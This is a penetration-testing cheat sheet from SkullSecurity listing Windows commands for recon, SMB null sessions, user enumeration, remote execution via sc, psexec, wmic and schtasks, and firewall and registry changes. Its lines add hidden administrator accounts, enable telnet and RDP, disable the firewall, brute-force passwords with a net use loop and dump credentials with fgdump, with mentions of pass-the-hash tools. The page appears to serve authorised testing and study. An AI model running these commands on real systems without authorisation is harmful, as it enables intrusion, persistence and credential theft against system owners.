Windows Commands

From SkullSecurity

Recon

nslookup

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
  • Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
  • No recurse:
> set norecurse
> set recurse

Scanning

tracert

Parameters

  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait N ms for each reply before timing out (default 4000)

SMB session

Establishing a null session

net use \\<target> "" /u:""

Establishing an authenticated session

net use \\<target> <password> /u:<username>

Mount a share

net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>

Dropping SMB sessions

net use \\<target> /del

Dropping all SMB sessions (bad idea)

net use * /del

Pulling credentials (w/ SMB session)

Pulling credentials

enum -U <target>
enum -G <target>

user2sid

  • Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>

sid2user

  • Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i

Exploitation

Finding client-side programs

dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"

Service interaction

List running services

sc query

List all services

sc query state= all

List all service names

sc query state= all | find "SERVICE_NAME"

Query service information

sc query <servicename>
sc qc <servicename>

Start a service

sc config <servicename> start= demand
sc start <servicename>

Starting telnet

sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr

Starting terminal services

sc query termservice
sc config termservice start= demand
sc start termservice

Using sc to invoke an executable

net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>

Making that service invoke another executable

sc \\<target> create <name> binpath= "cmd.exe /k <command>"

Variables

Finding environment variables

set

Finding a specific variable

set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.

Users and groups

Listing users

net user

Creating a user

net user <username> <password> /add

Listing groups

net localgroup

Creating a group

net localgroup <groupname> /add

Adding a user to a group

net localgroup <groupname> <username> /add

Adding a user to the telnet users group

net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Adding a user to the terminal services group

net localgroup "Remote Desktop Users" <username> /add

List administrators

net localgroup administrators

Add an administrator

net user <username> <password> /add
net localgroup administrators <username> /add

Remove a user from a group

net localgroup <group> <username> /del

Delete a user

net user <username> /del

Firewall interaction

Help

netsh /?

Show config

netsh firewall show config

Open a specific port

netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>

Remove the port opening

netsh firewall del portopening protocol = <TCP|UDP> port = <port>

Disable the firewall completely (bad idea)

netsh firewall set opmode disable

Opening the firewall for telnet

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>

Opening the firewall for terminal services

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>

Opening the firewall for SSH

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>

Registry interaction

Query a key

reg query <keyname>

Adding a key

reg add <keyname> /v <valuename> /t <type> /d <data>

Export data

reg export <keyname> <filename.reg>

Import data

reg import <filename.reg>

Enabling terminal services

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

netstat

Finding a port

netstat -an | find "<port>"

ipconfig

Dump the DNS cache

ipconfig /displaydns

arp

Dump the ARP cache

arp -a

Looping

/L loop

for /L %i in (<start>,<step>,<stop>) do <command>

Counting

for /L %i in (1,1,255) do @echo %i

Ping scanning

for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"

DNS bruteforce

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

/F loop

for /F ["<options>"] %i in (<stuff>) do <command>

Looping through passwords

for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause

Portscanning from a file

for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i

psexec

Using psexec (sysinternals)

  • -s to run as system
  • -c to copy the program to the target first
  • -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>

at/schtasks

Starting the scheduler service

net use \\<target> <password> /u:<username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule

Scheduling with at:

at [\\<target>] <HH:MM><A|P> <command>

Scheduling with schtasks

schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>

wmic

Running a program

wmic /node:<target> /user:<username> /password:<password> process call create <command>

List and kill processes

wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete

Passwords

Account lockout

Info on Windows accounts

net accounts
net accounts /domain

fgdump

Options

  • -c -- don't get cached credentials
  • -h <target>
  • -u <username>
fgdump -c -h <target> -u <username>

Pass-the-hash toolkit (psh-toolkit)

Trend finally noticed/deleted these programs, so I don't have their parameters handy

  • whosthere-exe
  • genhash.exe
  • iam.exe

Helpful hints

ftp

Download a file as anonymous

ftp -A -s:ftp-script.txt <host>

The script

get <file>
bye

An even better script that grabs everything in the base directory

prompt
mget .
bye